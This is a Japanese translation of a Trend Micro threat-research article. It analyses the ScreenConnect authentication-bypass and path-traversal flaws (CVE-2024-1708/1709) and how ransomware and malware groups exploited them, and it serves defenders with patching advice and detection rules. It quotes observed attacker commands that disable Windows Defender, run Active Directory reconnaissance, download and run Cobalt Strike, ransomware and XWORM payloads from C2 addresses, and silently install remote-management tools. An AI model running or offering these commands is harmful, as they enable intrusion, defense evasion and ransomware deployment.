エクスプロイト&脆弱性
Black Bastaを含むランサムウェアグループがScreenConnectの脆弱性を悪用
2024年2月19日、ConnectWiseは、自社のソフトウェアScreenConnectに存在する深刻な脆弱性(CVE-2024-1708 および CVE-2024-1709)を公表しました。これらの脆弱性は、バージョン23.9.7以前に存在しており、悪用されると、攻撃者の不正アクセスによるシステムへの制御が可能となります。
2024年2月19日、ConnectWiseは、自社のソフトウェアScreenConnectに存在する深刻な脆弱性(CVE-2024-1708 および CVE-2024-1709)を公表しました。これらの脆弱性は、バージョン23.9.7以前に存在しており、悪用されると、攻撃者の不正アクセスによるシステムへの制御が可能となります。
さらに深刻なことに、これらの脆弱性を悪用したランサムウェアの展開が確認されており、このソフトウェアを使用している企業や組織に甚大な被害をもたらす可能性があります。これに対処するため、ConnectWiseは、緊急のセキュリティ修正プログラムをリリースしており、影響を受けるお客様には最新のオンプレミス版への更新を強く推奨しています。Trend Microをご利用のお客様は、最新のナレッジベースの記事で防御および検知に関するガイダンスをご確認ください。
本稿では、これら最近発見されたScreenConnectの脆弱性について詳細な分析を行います。また、トレンドマイクロのテレメトリーに基づき、CVE-2024-1708およびCVE-2024-1709を積極的に悪用している攻撃グループ(Black BastaやBl00dy Ransomwareなど)についても解説しています。
CVE-2024-1708およびCVE-2024-1709について
これらの脆弱性は、その重大性と速やかな対応の必要性を示すため、以下のようにCVE番号が割り当てられています。
1. CVE-2024-1708:パストラバーサルの脆弱性
詳細:ConnectWise ScreenConnect 23.9.7及びそれ以前のバージョンがこの脆弱性の影響を受けます。攻撃者はこの脆弱性を利用して、制限された範囲外のディレクトリやファイルに不正にアクセスすることができ、これが情報漏えいやシステム侵害に繋がる可能性があります。
基本スコア:8.4(高)
2. CVE-2024-1709:代替パスまたはチャンネルを利用した認証回避
詳細:ConnectWise ScreenConnect 23.9.7及びそれ以前のバージョンは、認証を回避する脆弱性に影響されます。この脆弱性により、攻撃者は機密情報や重要なシステムへの直接アクセスを得ることが可能になります。
基本スコア:10.0(緊急)
脆弱性の分析
以下、脆弱性とその根本的な原因に関して技術的な説明を行います。これらの脆弱性を組み合わせることで、攻撃者は影響を受けるシステムにおいて完全なリモートコード実行を行うことが可能になります。
CVE-2024-1709:代替パスまたはチャンネルを使用した認証回避
この脆弱性は、ScreenConnect.Web.dllのSetupModule内のパス処理の問題に由来します。特に、.NET HttpRequest.Pathプロパティを扱う関数onPostMapRequestHandlerの実装が不適切なことによります。
.NETでは、パスはFilePathとPathInfoを結合したものです。つまり、攻撃者はSetupWizard.aspxのHTTP POSTリクエストにPathInfoの追加情報を簡単に付加することで、ScreenConnectのセットアップウィザードを起動し、認証プロセスを回避することが可能です。
CVE-2024-1709は、悪用が非常に簡単であるため、特に注意が必要です。攻撃者がConnectwiseサーバでの不正アカウント作成に成功すると、そのアカウントを使ってコードを実行することができます。
CVE-2024-1708:パストラバーサル脆弱性
この脆弱性は、ScreenConnect.Core.dll内の以下の関数の問題に起因しています。
ScreenConnect.ZipFile.ExtractAllEntries
つまり、ユーザが提供するパスに対する不適切な検証により、これによりZipSlip攻撃によるディレクトリトラバーサルが可能となります。
実際の攻撃シナリオでは、攻撃者は、この脆弱性を悪用することで、感染端末にウェブシェルなどの不正なファイルをアップロードすることが可能となります。
CVE-2024-1709とCVE-2024-1708の攻撃チェーン
図5は、攻撃者がこれらの脆弱性を悪用する過程を図式化したものです。
さまざまな攻撃グループがScreenConnectの脆弱性を悪用
トレンドマイクロのテレメトリーによると、ConnectWiseのScreenConnectに存在するこれらの脆弱性がさまざまな攻撃グループに悪用されていることを確認しました。その手法は、ランサムウェアの展開から情報窃取、情報送出まで多岐にわたり、さまざまな侵入経路から生じており、これらの脆弱性に対してシステムを保護する緊急性を浮き彫りにしています。本稿では、それぞれの攻撃者の独自のアプローチを示す中、注目すべき多様な攻撃チェーンを詳説します。さらにこうした状況は、ScreenConnectのユーザにとって、効果的な防御策と迅速なパッチ適用が直ちに必要であることも強調しているといえます。
ランサムウェアBlack Basta の攻撃グループ
これらの脆弱性を悪用した攻撃グループの中で、特に悪名高いのがBlack Bastaです。ScreenConnectの脆弱版を実行しているいくつかの環境で、Black Basta関連のCobalt Strikeビーコンの配備が確認されました。
このランサムウェアは、脆弱なサーバへの初期侵入の後、偵察活動、事前調査、特権昇格といった活動を開始し、以下のコマンドを実行しました。
関連するMITRE ID:T1078.003, T1482, T1078.001
以下のコマンドは、「Domain Admins」グループの全メンバーをリストアップするために使用されます。これは、特に権限の高いこのグループのメンバーを特定し、さらなる攻撃における潜在的な高い付加価値の目標を見つけ出す目的があります。
net.exe group "Domain Admins" /domain
以下のコマンドは、全てのドメイン信頼関係を列挙するために使われます。これは、ドメイン間での水平移動・内部活動、リソースへのアクセスを計画する上で欠かせない情報です。
nltest.exe /domain_trusts /all_trusts
以下のコマンドは、新規ユーザやグループをローカルの管理者グループに追加する際に利用されます。
net.exe localgroup Administrators Adminis /add
また、攻撃者は、アクティブディレクトリ環境内で過去90日以内にログオンしたコンピュータの数を確認するスクリプトも展開しています。これは、ネットワーク内でのさらなる悪用や水平移動・内部活動の目標となるアクティブなターゲットを特定するために用いられる可能性が高いといえます。
関連するMITRE ID:T1087
powershell.exe -c "$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PageSize = 10000;$s.PropertiesToLoad.Add('cn') > $Null;Foreach ($CA in $s.FindAll()){;$i++;}; Write-Output Total computers: $i"
また、以下のBlack Basta関連のCobalt Strikeペイロードが展開されていることを確認しました。
関連するMITRE ID:T1059.001
Cobalt Strikeを展開するその他の攻撃グループ
関連するMITRE ID:T1562:
powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true"
Black Basta以外にも、Cobalt Strikeペイロードを積極的に展開する攻撃グループがあります。彼らは侵害された被害者の環境に足がかりを得た後、最初にPowerShellを使ってWindows Defenderのリアルタイム監視を無効化することで、防御機構を回避しました。
powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true"
その次に、以下のコマンドを実行してCobalt Strikeのペイロードをダウンロードしました。
関連するMITRE ID:T1059.001
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://159[.]65[.]130[.]146:4444/a'))"
このCobalt Strikeのペイロードは、以下のPowerShellスクリプトであり、
SHA256: e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92
以下のC&Cサーバに接続して追加のコマンドを実行する能力を持っています。
159[.]65[.]130[.]146/activity
最後のペイロードについては、現時点では不明です(ダウンロードできなくなっています)。しかし、オープンソースの調査によれば、以下のリンクからダウンロードされるようです。
hxxp://159[.]65[.]130[.]146:4444/svchost.exe
ランサムウェアグループBl00dy
ランサムウェアグループBl00dyは、これらScreenConnectの脆弱性を悪用し、不正な利益を得ています。この攻撃グループは2022年5月に初めて確認され、それ以前にはソフトウェアPaperCutの脆弱性(CVE-2023-27350)を含む、さまざまなゼロデイ脆弱性をランサムウェア展開に使用していました。
当時の攻撃キャンペーンでは、ランサムウェアContiやLockBit Black(別名:LockBit 3.0)から流出したビルダーを使用していました。そして彼らは身代金要求の脅迫状で自分たちのことを「Bl00dyランサムウェアチーム」と明かしています。
関連するMITRE ID:T1105
ランサムウェアグループBl00dyがペイロードをダウンロードして実行するために使用したコマンドは以下の通りです:
certutil.exe -urlcache -split -f http://23[.]26[.]137[.]225:8084/msappdata.msi c:\mpyutd.msi
C:\Windows\System32\cmd.exe "/c powershell -command ""curl hxxp://23[.]26[.]137[.]225:8084/msappdata.msi -o c:\mpyuts.msi"""
ランサムウェアペイロード:
8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
このランサムウェアペイロードでは、以下のファイル名で身代金要求の脅迫状が生成され、暗号化されたファイルには「.CRYPT」という拡張子が追加されます。
Read_instructions_To_Decrypt.txt
C:\Windows\System32\cmd.exe "/c powershell -command ""curl hxxp://23[.]26[.]137[.]225:8091/chromeset.exe -o c:\chromeset.exe"""
ランサムウェアペイロード:
3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623
さらに2つ目のランサムウェアペイロードは、2022年に流出したLockBit Blackのビルダーを利用しています。暗号化されたファイルのアイコンと感染端末のデスクトップに表示されるスクリーンセーバーはLockBit Blackのものに変更されますが、図6で示されているBl00dyの身代金要求の脅迫状と同じ内容が表示されます。
マルウェアXWORMの拡散する攻撃者
攻撃者がマルウェアXWORMを介してScreenConnectの脆弱性を悪用しているケースも確認されました。XWORMは、リモートアクセスだけでなく、ネットワークを跨ぐ拡散、機密情報の送出、さらに追加ペイロードのダウンロードなどを備えた多機能マルウェアです。
ConnectWiseのサーバへ侵入後、攻撃者がXWORMをダウンロードし実行するために以下のPowerShellコマンドを実行しようとしたことが確認されました。
関連するMITRE ID:T1059.001
powershell.exe -w h -ExecutionPolicy Bypass -Command "(I'w'r('hxxps://paste[.]ee/r/mzeOz/0') -useB) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex');"
powershell.exe -w h -ExecutionPolicy Bypass -Command "(I'w'r('hxxps://paste[.]ee/r/pxLkv/0') -useB) | .('{1}{jaHxp}'.replace('jaHxp','0')-f'!','I').replace('!','ex');"
ダウンロードされたファイルの中には、以下のPowerShellスクリプトが含まれており、
SHA256: 47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27
このマルウェアは、XWORMペイロードのバージョン5.2を配布し、追加の作業を行うために以下のC&Cサーバに接続する機能も備えています。
input-beats[.]gl[.]at[.]ply[.]gg
他のリモート管理ツールを悪用する攻撃者
また、ConnectWise、Atera、Syncro など、さまざまなリモート管理ツールを展開する攻撃者も確認しています。以下、今回確認した注目すべき2件を紹介します:
別のScreenConnectクライアントを導入した攻撃者
この場合、以下のコマンドを実行することで脆弱性を悪用し、ドメインコントローラーを侵害する様子が確認されました。
関連するMITRE ID:T1087.003, T1482, T1087.001
net.exe group "domain computers" /domain
nltest.exe /domain_trusts
nltest.exe /dclist:
C:\Windows\System32\net.exe localgroup administrators
その後、BITSAdminツールの悪用により、別のScreenConnectクライアントがダウンロードされ、実行されました。
関連するMITRE ID:T1105
c:\windows\system32\bitsadmin.exe /transfer conhost /download /priority FOREGROUND hxxps://transfer[.]sh/get/HcrhQuN0YC/temp3[.]exe c:\programdata\sc.exe'
ScreenConnectクライアント:SHA256:
86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132
ScreenConnectのリレーURL:
instance-tj4lui-relay.screenconnect[.]com
Atera RMMを介して欧州地域を狙う攻撃者
トレンドマイクロのテレメトリーによると、攻撃者はScreenConnectの脆弱性を悪用して、特にベルギーを中心に欧州地域の複数の対象に対してAtera Remote Monitoring & Management (RMM) ツールのトライアルバージョンを展開したことが確認されました。
そして攻撃者が操作するScreenConnectクライアントから、脆弱な環境で以下のようなコマンドの実行が確認されました。
関連するMITRE ID:T1219
C:\WINDOWS\system32\msiexec.exe /i setup.msi /qn IntegratorLogin=pichet1208@outlook.com CompanyId=1 AccountId=001Q3000007zwkMIAQ
このコマンドは、msiexecアプリケーションを利用してソフトウェアAtera RMMのインストールプロセスを開始します。
結論
ConnectWiseのソフトウェアScreenConnectに存在する脆弱性を悪用するさまざまな攻撃者に関する検証を行った結果、トレンドマイクロとしては、当該ソフトウェアを直ちに最新バージョンへ更新することを推奨します。迅速な修正パッチ適用は推奨実行というだけでなく、特定された脅威からシステムを守る上では、重要なセキュリティ上の必須事項といえます。プロアクティブな更新の管理は、これらの洗練された攻撃から堅固なサイバーセキュリティ防御を維持する上で不可欠です。トレンドマイクロのユーザは、当社の製品を利用して、悪用発生後の検出や修復活動の対応方法についてナレッジベースの記事もご参照ください。
これらの脆弱性が攻撃者に悪用された場合、機密情報が漏えいし、企業や組織の場合、ビジネスの運営が妨げられ、大きな財務的損失を招く恐れがあります。攻撃者がこれらの脆弱性を悪用してランサムウェアを拡散している現状は、こうした対策の緊急性を一層高めています。適切な情報を得て迅速に行動を起こすことで、企業や組織は潜在的なセキュリティ侵害とそれに伴う影響を阻止することができます。
付録
MITRE ATT&CK techniques
Trend Vision One のクエリ
Trend Micro Cloud One - Network Security & TippingPoint Filters
- 43908 - HTTP: ConnectWise ScreenConnect Authentication Bypass Vulnerability
- 43910 - HTTP: ConnectWise ScreenConnect Path Traversal Vulnerability
Trend Vision One Network Sensor and Trend Micro Deep Discovery Inspector (DDI) Rule
- 5006: CVE-2024-1708 - ConnectWise ScreenConnect Directory Traversal Exploit - HTTP (Request)
- 5007: CVE-2024-1709 - ConnectWise ScreenConnect Authentication Bypass Exploit - HTTP (Response)
Trend Vision One Endpoint Security, Trend Cloud One - Workload and Endpoint Security, Deep Security and Vulnerability Protection IPS Rules
- 1011095 - ConnectWise ScreenConnect Authentication Bypass Vulnerability (CVE-2024-1709)
侵入の痕跡(Indicators of Compromise、IoC)
詳細はこちらをご参照ください。
参考記事:
Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
By: Ian Kenefick, Junestherry Dela Cruz, Peter Girnus
翻訳:与那城 務(Core Technology Marketing, Trend Micro™ Research)